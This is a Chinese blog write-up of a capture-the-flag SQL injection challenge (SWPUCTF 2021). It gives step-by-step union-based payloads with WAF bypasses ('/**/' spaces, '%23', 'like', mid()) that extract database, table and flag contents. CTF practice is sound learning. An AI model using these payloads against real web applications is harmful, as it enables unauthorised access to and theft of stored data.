[SWPUCTF 2021 新生赛]sql

于 2024-05-13 14:20:38 发布
阅读量1.3k 收藏 39
点赞数 31
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84499442/article/details/138729578
版权

在学了SQL注入以后就迫不及待地想练练手,发现这一题好像有点难度,就总结一下

首先打开网页,映入眼帘的是我们熟悉的男人——杰哥

但是比起这个,这个信息更吸引我

注意看,这个网页提醒我们,“参数是wllm”。

通过抓包,我们发现这里需要传入GET型参数,那么我们先随便传入一个数字试一试这里显示正常

那么我们先按照正常的步骤操作,再判断有几列,把“wllm=1 order by 4”传进去                          

这里显示出错误,那么我们就要想到是不是联合注入,尝试一下                                                       

这里翻译过来的意思就是“您的 SQL 语法有错误;查看与您的 MariaDB 服务器版本相对应的手册,了解在第 1 行的“1”LIMIT 0,1“附近使用的正确语法”,这里我们起码知道了这是一个联合注入,那么事情就好办了。

这里我们把问题描述直接发给gpt,解释如下

但是,首先,排除1和2,然后想到会不会是后端过滤掉了一些特殊符号,也就是这里的第四条。那么试试,首先把空格替换为“/**/”,结果如下:                                                                                 

这里发现还不行,但是我们这段代码如果有问题就只能是结尾的”#“有问题,它应该也被过滤了,这里我们把”#“替换成“%23”(url编码)试一试                           

这里终于显示出我们所期盼的结果了,依次减少列数,这里就不再演示,列数为3,那么就只需要把模板套进去就行了。首先输入”wllm=0'  union select 1,2,database()“,记得把空格替换成”/**/“以及结尾输入”%23“ 。下面三个查询命令同样如此,不再赘述。                                                                                                         

  这里显示库名称为”test_db“,再输入”“           

wllm=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="test_db"                                                                                                                                                                   

但是 这里又出问题了,看了其他大神的解释发现,这里结尾的”=“也被过滤了,那么用”like“替换它,

                                                                                                                                          

这里显示有两个表,很明显我们要查找的表是”LTLT_flag“,再输入”wllm=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name= "LTLT_flag"

然后再输入

wllm=0' union select 1,2,flag from test_db.LTLT_flag

好消息:我们得到了flag,坏消息,这个flag只有一部分,这里我们可以使用right函数。此函数相关解释如下:

先查看该函数是否被禁用,查看一个函数是否被禁用,只需要再url编码后面添加该函数的名字即可

这里发现right函数被禁用。

幸运的是,mid函数为被禁用

那么接下来开始操作 

下面的最终代码可以直接拷贝粘贴,不需要再替换空格之类的

             输入“?wllm=0'/**/union/**/select/**/1,2,mid(flag,1,20)/**/from/**/test_db.LTLT_flag%23”                                                                                                            

再输入“?wllm=0'/**/union/**/select/**/1,2,mid(flag,21,40)/**/from/**/test_db.LTLT_flag%23”

再输入

“?wllm=0'/**/union/**/select/**/1,2,mid(flag,41,60)/**/from/**/test_db.LTLT_flag%23”

把三段字符拼接出来就得到了最终的flag

小吕要加油
关注
[SWPUCTF 2021 新生]web 解题思路,实操解析,解题软件,解题方法
09-06
关于sql注入
NSSCTF练习记录:[SWPUCTF 2021 新生]easy_sql
qq_44396970的博客
07-31 184
3的时候正常回显,4的时候显示Unknown column ‘4’ in ‘order clause’,说明有3列数据。在回显位上,输入database和version查看数据库名和版本。显示出数据库test_db中所有的表名。判断回显位在222处和333处。查看test_tb表中的所有列。查看网页发现参数为wllm。
NSS [SWPUCTF 2021 新生]sql
Jay17的博客
10-26 771
NSS [SWPUCTF 2021 新生]sql
[SWPUCTF 2021 新生]web 中国蚁剑.zip
最新发布
09-07
蚁剑支持多种常见的Web漏洞,如SQL注入、命令执行等,用户可以通过它快速识别和利用这些漏洞。 该软件的特点包括: 易于使用:直观的界面设计,适合初学者和专业人士。 多功能:支持多种攻击方式和漏洞类型,满足...
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比是一...
2021工作日sql
01-07
2021工作日sql
2019-2021工作日sql
01-01
只区分工作日和非工作日
[SWPUCTF 2021 新生]easy_sql
wyxlsm的博客
02-20 306
看库的表 使用函数 union_select 和 information_schema 的函数。我们可以简单看到 name:xxx password:yy 可能有数据库等你注入。这里 就看到提示你参数wllm 这边使用get 传参 让你输入点东西 可以。可以看出 使用函数 union_select 的命令 看出上限 在3。wllm =1' 可以看出字符串漏洞 去一步一步的开库。看到这个界面你直接打开F12或F11看源代码 看有什么提示。已经得出 查看flag值。
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 860
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
[SWPUCTF 2021 新生]sql 关于sql的注入替换
qq_62046696的博客
05-16 2333
打开界面,看见参数是wllm,测试一下是否存在sql注入,首先?wllm=1回显正确,wllm=1'错误存在字符型注入,然后输入人?wllm='1 %23报错发现空格被掠过,然后%23是#的编码。 /**/是空格的一个格式,发现一共有三列 然后测试了一下,=号果不其然也被略过,like可以顶替等于号 构造? url=wllm=-1'union/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/*
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 694
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
CTF刷题第一周
qq_62660611的博客
11-10 1866
第一周刷题记录
SWPUCTF 2021 新生 easy_sql
JasonJiao66的博客
01-28 469
当传1‘时出现报错,我们知道这是一个字符型注入,那么接下来还是先把句尾注释掉,然后使用order by语句,从1开始试,到4时开始报错,那么我们知道其有三个字段。首先打开题目,照片左上角求我们赶紧写一点东西,网站标题中则提升我们应该去传一个wllm的值,我们先给杰哥传一个1,回显正常。将1改为-1后,使用union selec,用户名与密码的位置出现了我们注入得到的2与3,表明这两个位置我们可用。接着继续加入limit n,1用group_concat()函数连接到一行显示来对库进行查询。
sql [SWPUCTF 2021 新生]easy_sql
m0_75178803的博客
12-21 522
打开题目,直接查看源代码给了提示注入点是wllm。输入1' 报错,说明注入点是字符型注入。我们知道表名有test_tb和users。同样这道题也可以用sqlmap跑一下看看。然后得到了name和password。我们知道数据库名为test_db。我们选择test_tb进行爆破。看见有id和flag两个字段。爆破数据显示位为2,3。我们直接爆破数据库名。
CTF挑战:SQL注入实战技巧解析
"这篇资源主要分享了CTF(Capture The Flag)比中的SQL注入攻击技巧,包括找到注入点、判断字段、联合查询等步骤,并介绍了如何利用这些技巧获取数据库信息和数据内容。" 在CTF比中,SQL注入是一种常见的安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值